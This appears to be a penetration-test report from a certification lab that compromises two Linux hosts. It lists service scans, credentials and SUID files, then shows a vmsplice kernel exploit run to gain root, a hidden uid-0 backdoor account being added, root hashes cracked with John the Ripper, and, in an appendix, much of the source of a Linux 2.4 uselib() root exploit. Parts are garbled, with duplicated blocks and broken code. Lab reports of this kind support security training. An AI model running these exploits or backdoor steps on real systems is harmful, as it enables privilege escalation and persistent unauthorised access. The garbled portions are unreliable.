The locations of all files that are set to execute as the root user were
gathered. This will provide a list of executables that should be
researched for exploits.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf
"%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_104.txt
The information gathered during this phase was used mainly for exploit
research. However, several files of interest were discovered. Namely,
the CISngtool (Center for Internet Security, Next Generation scoring
tool - http://www.cisecurity.org).
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtablock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh,
/usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth,
/bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs,
/sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs,
/sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage,
/usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/sshkeysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux
G. Penetration of cptvm1
i. Local exploit research via anyside.org
The list of files designated to execute as root was processed to gain
only the base name of the file. This list would be used to search
against the anyside.org exploit list.
$ awk '{ print "basename ", $4 }' suid_root_200.txt > basename_200.txt
$ chmod +x basename_200.txt
$ ./basename_200.txt | sort -u > basename-2_200.txt
$ cat basename-2_200.txt
XFree86
at
chage
chfn
chsh
crontab
gpasswd
inndstart
lppasswd
mount
newgrp
pam_timestamp_check
passwd
ping
ping6
pwdb_chkpwd
rcp
rlogin
rnews
rsh
ssh-keysign
startinnfeed
su
sudo
suexec
traceroute
traceroute6
umount
unix_chkpwd
userhelper
userisdnctl
usernetctl
The list of exploits used during the remote exploit search was re-used
to search for local exploits on the cptvm1 host.
$ grep exploits\/local exploits_list.txt | grep
2_200.txt > possible_local_200.txt
$ ll
total 1672
drwxr-xr-x
7 matt matt
238 Feb 21 14:47
drwxr-xr-x
15 matt matt
510 Feb 21 14:47
-rw-r--r-1 matt matt 126720 Feb 6 14:40
-rw-r--r-1 matt matt 702666 Sep 21 05:52
-rw-r--r-1 matt matt
1699 Feb 15 20:34
-rw-r--r-1 matt matt
9376 Feb 6 14:43
-w -i -f ../commands/basename-
./
../
exploits_list.db.tgz
exploits_list.txt
possible_local_200.txt
possible_remote_200.txt
$ cat possible_local_200.txt
2006-07-15;http://www.anyside.org/exp/exploits/local/2006071503.txt;Rocks
Clusters <= 4.1 (mount-loop) Local Root Exploit
2006-07-15;http://www.anyside.org/exp/exploits/local/2006071502.txt;Rocks
Clusters <= 4.1 (umount-loop) Local Root Exploit
2006-03-01;http://www.anyside.org/exp/exploits/local/2006030101.txt;Apple Mac
OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit
2006-01-
25;http://www.anyside.org/exp/exploits/local/2006012501.txt;SquirrelMail 3.1
Change Passwd Plugin Local Buffer Overflow Exploit
2005-11-09;http://www.anyside.org/exp/exploits/local/2005110903.txt;FreeBSD
(4.x , < 5.4) master.passwd Disclosure Exploit
2005-11-09;http://www.anyside.org/exp/exploits/local/2005110902.txt;Sudo <=
1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit
2005-11-08;http://www.anyside.org/exp/exploits/local/2005110801.txt;SuSE Linux
<= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit
2005-07-04;http://www.anyside.org/exp/exploits/local/2005070403.txt;Sudo 1.3.1
- 1.6.8p Pathname Validation Local Root Exploit (openbsd)
....;http://www.anyside.org/exp/exploits/local/r57sudo.c;OpenBSD sudo 1.3.1 1.6.8p local root exploit
....;http://www.anyside.org/exp/exploits/local/x_hpux_11i_nls_cu.c;The same
vulnerability to x_hp-ux11i_nls_ct.c,but exploit ping command to get root
shell
2004-9-19;http://www.anyside.org/exp/exploits/local/sudo-exploit.c;sudo
exploit.
2004-9-11;http://www.anyside.org/exp/exploits/local/cdrecordsuidshell.sh.txt;cdrecord $RSH exec() SUID Shell Creation
....;http://www.anyside.org/exp/exploits/local/xlock-XLOCALEDIR.c;Local root
exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4.2.x using
xlock. Written to work on Redhat 7.2.
The version of sudo fits within the requirements for the Sudo <=
1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit. So, it
was downloaded and the code reviewed. Unfortunately, this exploit
relies on an entry within the /etc/sudoers file that points to a file the
user has full access to modify. This situation does not exist on the
cptvm1 host.
The sudo exploit exploit doesn't provide enough information about its
requirements to rule it out. Attempting to download the exploit
resulted in a 404 error from the anyside.org web site. Without a more
detailed description, more research into this exploit was suspended.
ii. Local exploit research via secwatch.org
Searches for exploits of at, chage, chfn, chsh, crontab, lppasswd,
mount, newgrp, pam_timestamp_check, passwd, ping, ping6, rcp,
rlogin, rnews, rsh, sudo, suexec, traceroute, umount, unix_chckpwd,
userhelper and xfree86 returned quite a number of results. Most of
the exploits were eliminated due to mismatches on the operating
system or version. The remaining exploits, 24 exploits in total, were
downloaded, reviewed, compiled and tested. It should be noted that
the gcc compiler on the cptvm1 host was named gcc296. To make
things easier, a bin directory was created within the cptvm1 user's
home directory, a symbolic link named gcc was created for gcc296 and
the bin directory was added to the PATH. No successful exploits for
the executables listed above were found.
A search for inndstart provided an interesting exploit. Instead of a
typical buffer overflow exploit, this exploit was caused by a poorly
planned application feature. An environment variable named INNCONF
can be defined to point to the location of the inn.conf configuration file.
This enables a local user with access to the inndstart program to
create their own innd.conf file with a "pathrun" component pointing to
a directory owned by root and defining a program of their choosing to
be executed as root.
./
../
uselib*
uselib.c
I. Penetration of cptvm2
i. Privilege escalation using a Kernel vmsplice exploit
Since the cptvm1 host fell to a kernel exploit, time was not spent
researching third party applications and system utility exploits on the
cptvm2 host. A search on milw0rm.com for linux kernel 2.6 resulted
in the following exploits.
This left 2 exploits, Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root
Exploit and Linux Kernel 2.6.x chown() Group Ownership Alteration
Exploit. The exploits were taken in order, compiled and executed.
The qaaz, 2008-02-09, Linux Kernel 2.6.17 2.6.24.1 vmsplice Local
Root Exploit resulted in a shell with root access.
[cptvm1@localhost kernel26_vmsplice]$ ll
total 16
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ gcc -o jessica_biel_naked_in_my_bed
jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ll
total 28
-rwxrwxr-x 1 cptvm1 cptvm1 8522 Feb 7 04:05 jessica_biel_naked_in_my_bed
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ./ jessica_biel_naked_in_my_bed
----------------------------------Linux vmsplice Local Root Exploit
By qaaz
----------------------------------[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f36000 .. 0xb7f68000
[+] root
[root@localhost kernel26_vmsplice]# id
uid=0(root) gid=0(root) groups=500(cptvm1)
[root@localhost kernel26_vmsplice]#
LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33
;01:or=01;05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32
:*.btm=00;32:*.bat=00;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=
00;31:*.taz=00;31:*.lzh=00;31:*.zip=00;31:*.z=00;31:*.Z=00;31:*.gz=00;31:*.bz2
=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31:*.cpio=00;31:*.jpg=00;35:*.gif=00;35:
*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*.tif=00;35:
SSH_AUTH_SOCK=/tmp/ssh-aqCddQ3075/agent.3075
GNOME_KEYRING_SOCKET=/tmp/keyring-euEoqc/socket
USERNAME=cptvm1
SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/3075
PATH=/usr/kerberos/sbin:/usr/bin:/usr/sbin:/bin:/sbin:/usr/kerberos/bin:/usr/l
ocal/bin:/usr/bin:/bin:/usr/X11R6/bin:/home/cptvm1/bin
DESKTOP_SESSION=default
MAIL=/var/spool/mail/cptvm1
GDM_XSERVER_LOCATION=local
PWD=/home/cptvm1/cpt/exploits/kernel26_vmsplice
INPUTRC=/etc/inputrc
XMODIFIERS=@im=none
LANG=en_US.UTF-8
GDMSESSION=default
SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass
SHLVL=3
HOME=/home/cptvm1
GNOME_DESKTOP_SESSION_ID=Default
LOGNAME=cptvm1
CVS_RSH=ssh
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbusyuVqOWjtSW,guid=f9418d49bbcbb5875e2b080cbf709f00
LESSOPEN=|/usr/bin/lesspipe.sh %s
DISPLAY=:0.0
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
XAUTHORITY=/tmp/.gdmI40NOU
COLORTERM=gnome-terminal
_=/usr/bin/env
[root@localhost kernel26_vmsplice]# useradd -u 0 -o -g 0 -d /root r00t
useradd: warning: the home directory already exists.
Not copying any file from skel directory into it.
[root@localhost kernel26_vmsplice]# passwd r00t
Changing password for user r00t.
New UNIX password:
BAD PASSWORD: it is based on a dictionary word
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
[root@localhost kernel26_vmsplice]#
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtablock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh,
/usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth,
/bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs,
/sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs,
/sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage,
/usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/sshkeysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin
With this new approach in mind, additional john sessions were created
to use the googled password.txt file and the newly generated aspell
dumped file. The results were far more impressive than anticipated.
Within 2 seconds, the password for the root account had been cracked.
bt cptvm1 # john --session=cptvm1-3 --users=root -wordlist=../passwords/118051wordDictionary.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
cavalry
(root)
guesses: 1 time: 0:00:00:02 100% c/s: 5511 trying: cavalry
At this point, the john session that had been started to use the
googled password.txt file as a wordlist was aborted.
bt cptvm1 # john --session=cptvm1-2 --users=root -wordlist=../passwords/passwords.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0 time: 0:00:00:22 100% c/s: 5502 trying: !
In addtion, the initial john session was also aborted. I want those 11
hours of my life back, certification crew! :)
bt cptvm1 # john --session=cptvm1 --users=root shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0 time: 0:10:53:47 (3) c/s: 5722 trying: 35885297
Session aborted
L. Ultimate goal
i. Cptvm1 and ctpvm2 hosts compromised
The initial access to the cptvm1 was obtained by brute force password
guessing of the user account. After gaining basic access to the
cptvm1 host, the cptvm1 and cptvm2 user accounts were brute
force password attacked. This provided basic access to the cptvm2
hosts. The cptvm1 host was then compromised via a VMA exploit.
Next, the cptvm2 host was compromised via a vmsplice exploit.
Finally, the root passwords were cracked.
ii. Passwords for root accounts on cptvm1 and cptvm2
The password for root@cptvm1 is cavalry
The password for root@cptvm2 is admin
M. Lessons learned
i. Searching exploit sites
The quality of the exploits and exploit information varies radically
between sites. For example, the milw0rm.com site has good quality
code but limited information on the background of the exploit. In
contrast, the www.securityfocus.com site has more extensive
information about an exploit but may only list Exploit code has been
published instead of actual exploit code.
With such a wide foot print for searches in mind, a site like
secwatch.org should be the preferred solution. However, it was found
that certain searches don't perform well via secwatch.org.
5. Appendix
A. Source code for the Kernel 2.4 VMA exploit
/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*
* original exploit source from http://isec.pl
* reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
*
* I modified the Paul Starzetz's exploit, made it more possible
* to race successfully. The exploit still works only on 2.4 series.
* It should be also works on 2.4 SMP, but not easy.
*
* thx newbug.
*
* Tim Hsu <timhsu at chroot.org> Jan 2005.
*
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
<stdio.h>
<stdlib.h>
<string.h>
<fcntl.h>
<unistd.h>
<errno.h>
<sched.h>
<syscall.h>
<limits.h>
#include
#include
#include
#include
#include
<sys/types.h>
<sys/wait.h>
<sys/time.h>
<sys/mman.h>
<sys/sysinfo.h>
#include <linux/elf.h>
#include <linux/linkage.h>
#include <asm/page.h>
#include <asm/ldt.h>
#include <asm/segment.h>
#define str(s) #s
#define xstr(s) str(s)
#define MREMAP_MAYMOVE
//
temp lib location
#define LIBNAME
"/tmp/_elf_lib"
//
shell name
#define
SHELL
"/bin/bash"
//
time delta to detect race
#define RACEDELTA 5000
//
if you have more deadbabes in memory, change this
#define MAGIC
0xdeadbabe
//
do not touch
#define
SLAB_THRSH
128
#define
SLAB_PER_CHLD(INT_MAX - 1)
#define LIB_SIZE
( PAGE_SIZE * 4 )
#define STACK_SIZE ( PAGE_SIZE * 4 )
#define LDT_PAGES
( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )
( ENTRY_GATE-2 )
( (ENTRY_LCS<<3)|0x04 )
#define ENTRY_LDS
#define SEL_LDS
( ENTRY_GATE-1 )
( (ENTRY_LDS<<3)|0x04 )
#define kB
#define MB
#define GB
* 1024
* 1024 kB
* 1024 MB
#define TMPLEN
#define PGD_SIZE
256
( PAGE_SIZE*1024 )
delta = 0,
delta_max = RACEDELTA,
map_flags = PROT_WRITE|PROT_READ;
static int
fstop=0,
silent=0,
pidx,
pnum=0,
smp_max=0,
smp,
wtime=2,
cpid,
uid,
task_size,
old_esp,
lib_addr,
map_count=0,
map_base=0,
map_addr,
addr_min,
addr_max,
vma_start,
vma_end,
max_page;
static struct timeval tm1, tm2;
static char *myenv[] = {"TERM=vt100",
"HISTFILE=/dev/null",
NULL};
static char hellc0de[] =
"\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70"
"\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75
\x65\x52\x00";
static char *pagemap, *libname=LIBNAME, *shellname=SHELL;
#define
#define
#define
#define
#define
#define
#define
#define
__NR_sys_gettimeofday
__NR_gettimeofday
__NR_sys_sched_yield
__NR_sched_yield
__NR_sys_madvise __NR_madvise
__NR_sys_uselib
__NR_uselib
__NR_sys_mmap2
__NR_mmap2
__NR_sys_munmap
__NR_munmap
__NR_sys_mprotect __NR_mprotect
__NR_sys_mremap
__NR_mremap
sys_gettimeofday(&tm2, NULL);
delta = tmdiff(&tm1, &tm2);
if(!smp_max && delta < (unsigned)delta_max) goto recheck;
smp = smp_max;
//
check if lib VMAs exist as expected under race condition
recheck2:
val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);
if(val) continue;
errno = 0;
val = sys_madvise((void*) (lib_addr+PAGE_SIZE),
LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
if( !val || (val<0 && errno!=ENOMEM) ) continue;
//
SMP?
smp--;
if(smp>=0) goto recheck2;
//
recheck race
if(!go) continue;
finish++;
//
return 0;
}
int callme_1()
{
return val++;
}
inline int valid_ptr(unsigned ptr)
{
return ptr>=task_size && ptr<addr_min-16;
}
inline int validate_vma(unsigned *p, unsigned s, unsigned e)
{
unsigned *t;
if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) {
t=(unsigned*)p[3];
if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size )
return 1;
}
return 0;
}
asmlinkage void kernel_code(unsigned *task)
{
unsigned *addr = task;
//
//
}
void kcode(void);
//
CPL0 code mostly stolen from cliph
void __kcode(void)
{
asm(
"kcode:
"
pusha
\n"
"
pushl %es
\n"
"
pushl %ds
\n"
"
movl
$(" xstr(SEL_LDS) ") ,%edx \n"
"
movl
%edx,%es
\n"
"
movl
%edx,%ds
\n"
"
movl
$0xffffe000,%eax
\n"
"
andl
%esp,%eax
\n"
"
pushl %eax
\n"
"
call
kernel_code
\n"
"
addl
$4, %esp
\n"
"
popl
%ds
\n"
"
popl
%es
\n"
"
popa
\n"
"
lret
\n"
);
}
\n"
int callme_2()
{
return val + task_size + addr_min;
}
void sigfailed(int v)
{
ccnt++;
fatal("lcall", 1);
}
//
modify LDT & exec
void try_to_exploit(unsigned addr)
{
volatile int r, *v;
printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout);
unlink(libname);
r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags);
if(r) fatal("mprotect 1", 1);
//
//
setup CPL0 segment descriptors (we need the 'accessed' versions ;-)
v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) );
v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */
v[1] = 0x00cf9b00;
v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) );
v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */
v[1] = 0x00cf9300;
//
//
CPL0 transition
sys_sched_yield();
val = callme_1() + callme_2();
asm("lcall $" xstr(SEL_GATE) ",$0x0");
//if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) {
if (getuid()==0) {
printf("\n[+] exploited, uid=0\n\n" ); fflush(stdout);
} else {
printf("\n[-] uid change failed" ); fflush(stdout);
sigfailed(0);
}
signal(SIGTERM, SIG_IGN);
kill(0, SIGTERM);
setresuid(0, 0, 0);
execl(shellname, "sh", NULL);
fatal("execl", 0);
}
void scan_mm_finish();
void scan_mm_start();
//
kernel page table scan code
void scan_mm()
{
map_addr -= PAGE_SIZE;
if(map_addr <= (unsigned)addr_min)
scan_mm_start();
scnt=0;
val = *(int*)map_addr;
scan_mm_finish();
}
void scan_mm_finish()
{
retry:
__asm__("movl%0, %%esp" : :"m"(old_esp) );
if(scnt) {
pagemap[pidx] ^= 1;
}
else {
sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED);
}
pidx--;
scan_mm();
goto retry;
}
//
make kernel page maps before and after allocating LDT
void scan_mm_start()
{
static int npg=0;
static struct modify_ldt_ldt_s l;
//static struct user_desc l;
pnum++;
if(pnum==1) {
pidx = max_page-1;
}
else if(pnum==2) {
memset(&l, 0, sizeof(l));
l.entry_number = LDT_ENTRIES-1;
l.seg_32bit = 1;
l.base_addr = MAGIC >> 16;
l.limit = MAGIC & 0xffff;
l.limit_in_pages = 1;
if( modify_ldt(1, &l, sizeof(l)) != 0 )
fatal("modify_ldt", 1);
pidx = max_page-1;
}
else if(pnum==3) {
npg=0;
for(pidx=0; pidx<=max_page-1; pidx++) {
if(pagemap[pidx]) {
npg++;
}
else if(npg == LDT_PAGES) {
npg=0;
try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE);
} else {
npg=0;
}
}
fatal("find LDT", 1);
}
//
//
return number of available SLAB objects in cache
int get_slab_objs(const char *sn)
{
static int c, d, u = 0, a = 0;
FILE *fp=NULL;
char x1[20];
fp = fopen("/proc/slabinfo", "r");
if(!fp)
fatal("get_slab_objs: fopen", 0);
fgets(name, sizeof(name) - 1, fp);
do {
c = u = a = -1;
if (!fgets(line, sizeof(line) - 1, fp))
break;
c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a,
&d, &d, &d, &d);
} while (strcmp(name, sn));
close(fileno(fp));
fclose(fp);
return c == 7 ? a - u : -1;
}
long memmaped_size = 0;
//
leave one object in the SLAB
inline void prepare_slab()
{
int *r;
map_addr -= PAGE_SIZE;
map_count++;
map_flags ^= PROT_READ;
r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED == r) {
printf("--> prepare_slab(), %dMb\n", memmaped_size/1024/1024);
fatal("try again", 0);
}
memmaped_size += PAGE_SIZE;
*r = map_addr;
}
//
sig handlers
void segvcnt(int v)
{
scnt++;
scan_mm_finish();
}
//
child reap
void reaper(int v)
{
ccnt++;
waitpid(0, &v, WNOHANG|WUNTRACED);
}
//
sometimes I get the VMAs in reversed order...
//
so just use anyone of the two but take care about the flags
void check_vma_flags();
void vreversed(int v)
{
map_flags = 0;
check_vma_flags();
}
void check_vma_flags()
{
if(map_flags) {
__asm__("movl%%esp, %0" : :"m"(old_esp) );
} else {
__asm__("movl%0, %%esp" : :"m"(old_esp) );
goto out;
}
signal(SIGSEGV, vreversed);
val = * (unsigned*)(lib_addr + PAGE_SIZE);
out:
}
//
use elf library and try to sleep on kmalloc
void exploitme()
{
int r, sz, pcnt=0;
static char smiley[]="-\\|/-\\|/";
//
//
printf("\n
cat /proc/%d/maps", getpid() ); fflush(stdout);
helper clone
finish=0; ccnt=0;
sz = sizeof(cstack) / sizeof(cstack[0]);
cpid = clone(&raceme, (void*) &cstack[sz-16],
CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL );
if(-1==cpid) fatal("clone", 0);
//
synchronize threads
while(!finish) sys_sched_yield();
finish=0;
if(!silent) {
printf("\n"); fflush(stdout);
}
//
//
//
relax kswapd
sys_gettimeofday(&tm1, NULL);
for(;;) {
sys_sched_yield();
sys_gettimeofday(&tm2, NULL);
delta = tmdiff(&tm1, &tm2);
if( wtime*1000000U <= (unsigned)delta ) break;
}
//
//
//
failed:
printf("failed:\n");
fatal("try again", 0);
}
//
make fake ELF library
void make_lib()
{
struct elfhdr eh;
struct elf_phdr eph;
static char tmpbuf[PAGE_SIZE];
int fd;
//
//
//
section header:
memset(&eph, 0, sizeof(eph) );
eph.p_type = PT_LOAD;
eph.p_offset = 4096;
eph.p_filesz = 4096;
eph.p_vaddr = lib_addr;
eph.p_memsz = LIB_SIZE;
eph.p_flags = PF_W|PF_R|PF_X;
write(fd, &eph, sizeof(eph) );
//
execable code
lseek(fd, 4096, SEEK_SET);
memset(tmpbuf, 0x90, sizeof(tmpbuf) );
write(fd, &tmpbuf, sizeof(tmpbuf) );
close(fd);
}
//
move stack down #2
void prepare_finish()
{
int r;
static struct sysinfo si;
old_esp &= ~(PAGE_SIZE-1);
old_esp -= PAGE_SIZE;
task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB;
r = sys_munmap(old_esp, task_size-old_esp);
if(r) fatal("unmap stack", 0);
//
setup rt env
uid = getuid();
lib_addr = task_size - LIB_SIZE - PAGE_SIZE;
if(map_base)
map_addr = map_base;
else
map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1);
printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x",
go go
make_lib();
exploitme();
}
//
move stack down #1
void prepare()
{
unsigned p=0;
environ = myenv;
p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 );
if(-1==p) fatal("mmap2 stack", 0);
p += STACK_SIZE - 64;
__asm__("movl%%esp, %0
\n"
"movl %1, %%esp
\n"
: : "m"(old_esp), "m"(p)
);
prepare_finish();
}
void chldcnt(int v)
{
ccnt++;
}
//
alloc slab objects...
inline void do_wipe()
{
int *r, c=0, left=0;
__asm__("movl%%esp, %0" : : "m"(old_esp) );
old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1);
old_esp = map_base? map_base : old_esp;
for(;;) {
if(left<=0)
left = get_slab_objs("vm_area_struct");
if(left <= SLAB_THRSH)
break;
left--;
map_flags ^= PROT_READ;
old_esp -= PAGE_SIZE;
r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 );
